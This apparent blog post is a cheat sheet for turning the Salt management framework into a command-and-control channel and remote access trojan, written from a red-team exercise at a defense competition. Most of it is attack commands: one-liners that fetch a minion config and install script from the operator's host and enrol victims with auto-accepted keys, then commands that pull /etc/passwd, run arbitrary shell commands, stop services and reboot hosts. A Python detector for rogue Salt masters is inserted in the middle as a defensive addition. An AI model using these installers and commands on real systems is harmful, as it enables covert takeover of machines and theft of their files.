Salt Command and Control Cheat Sheet

Recently, as an experiment, I used the Salt framework as a malicious command and control (C&C or C2) infrastructure at NCCDC. It was really successful, and made for a highly reliable and manageable remote access trojan. There is a ton of great documentation already out there on Salt, but I wanted to take a minute to jot down some of my notes for future C2 excellence.

I had most of my stuff staged on a local network, such that it would be easy to install and call back to the master without having to traverse The Internet. I also had my server set up to auto-accept all keys, so I could receive callbacks and execute commands quickly without having to bother with accepting keys (salt-key -L / salt-key -A). As each box would connect back, I would try to give it a unique name based on hostname and when it was connecting back. Once on a box, I would attempt to install my minions as quickly as possible, typically with one of the following one-liners ready to go (broken out here). After that, you're off to the races with your botnet army!

Minion Installers

On Windows:
PS C:\ > $name = "win_"+$(hostname)+"_"+$(Get-Date -Format s)
PS C:\ > Salt-Minion-x64.exe /S /master=10.0.0.2 /minion-name=$name /start-service=1

On Linux w/ apt-get:
$ apt-get install salt-minion salt-common
$ wget http://10.0.0.2/minion
$ mv ./minion /etc/salt/minion
$ sudo service salt-minion start
Or install from a script:
$ wget http://10.0.0.2/saltmin.sh
$ chmod +x saltmin.sh
$ NOW=$(date +"%m-%d-%YT%k:%M:%S")
$ ./saltmin.sh -P -I -i "linux_`hostname`_`echo $NOW`" -A 10.0.0.2
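
A defender's check for the installs above, added here as an example and not part of the original post: it reads a minion config for master addresses outside an allowlist and flags established connections to Salt's default master ports (4505/4506). The allowlist address, the sample config, and the sample `ss -tn` output are constructed assumptions.

```python
import re

SALT_PORTS = {4505, 4506}  # Salt master defaults: publish and return ports

def minion_masters(config_text):
    """Return master addresses from a minion config (scalar or YAML list form)."""
    masters, in_list = [], False
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if not line.strip():
            continue
        scalar = re.match(r"^master:\s*(.*)$", line)
        if scalar:
            value = scalar.group(1).strip("'\" ")
            in_list = not value
            if value:
                masters.append(value)
        elif in_list and re.match(r"^\s*-\s*\S", line):
            masters.append(line.split("-", 1)[1].strip("'\" "))
        else:
            in_list = False
    return masters

def unsanctioned_masters(config_text, allowed):
    """Masters configured on this host that are not on the allowlist."""
    return [m for m in minion_masters(config_text) if m not in allowed]

def salt_connections(ss_output, allowed):
    """Flag established peers (ss -tn format) on Salt ports that are not allowed."""
    hits = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "ESTAB":
            continue
        host, _, port = fields[4].rpartition(":")
        if port.isdigit() and int(port) in SALT_PORTS and host not in allowed:
            hits.append((host, int(port)))
    return hits

# Constructed sample data. 10.0.0.2 is the master address used on this page;
# 192.0.2.10 stands in for a hypothetical sanctioned master.
ALLOWED = {"192.0.2.10"}
SAMPLE_MINION_CONF = "# /etc/salt/minion\nmaster: 10.0.0.2\nid: linux_web01_example\n"
SAMPLE_SS = """State Recv-Q Send-Q Local Address:Port Peer Address:Port
ESTAB 0 0 10.0.0.15:51234 10.0.0.2:4505
ESTAB 0 0 10.0.0.15:51236 10.0.0.2:4506
ESTAB 0 0 10.0.0.15:22 10.0.0.9:50022"""

if __name__ == "__main__":
    print("unsanctioned masters:", unsanctioned_masters(SAMPLE_MINION_CONF, ALLOWED))
    print("salt connections:", salt_connections(SAMPLE_SS, ALLOWED))
```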

Command Execution

Show which minions are up:
salt-run manage.up
Show minions that are down:
salt-run manage.down
Show all minions status:
salt-run manage.status
Test all minions connectivity:
salt '*' test.ping

Check if a process is running on all minions:
salt '*' ps.grep apache

Check if a file on all minions contains a string:
salt "*" file.contains /etc/passwd "admin"

Pull a file from a subgroup of minions:
salt "linux*" cp.push /etc/passwd

Send a file from the master to a subgroup of minions:
salt-cp "linux*" script_to_copy.py /target-dir/copy_of_script.py

Run arbitrary commands on a subgroup of minions:
salt "linux*" cmd.run "ls -lah /home/"

Get networking info from all minions:
salt '*' network.ip_addrs
More functions available in the network module:
network.ping, network.traceroute, network.get_hostname, network.mod_hostname

Get uptime of all minions:
salt '*' status.uptime

Reboot all minions:
salt '*' system.reboot

Check, start, or stop a service:
salt '*' service.status httpd
salt '*' service.start httpd
salt '*' service.stop httpd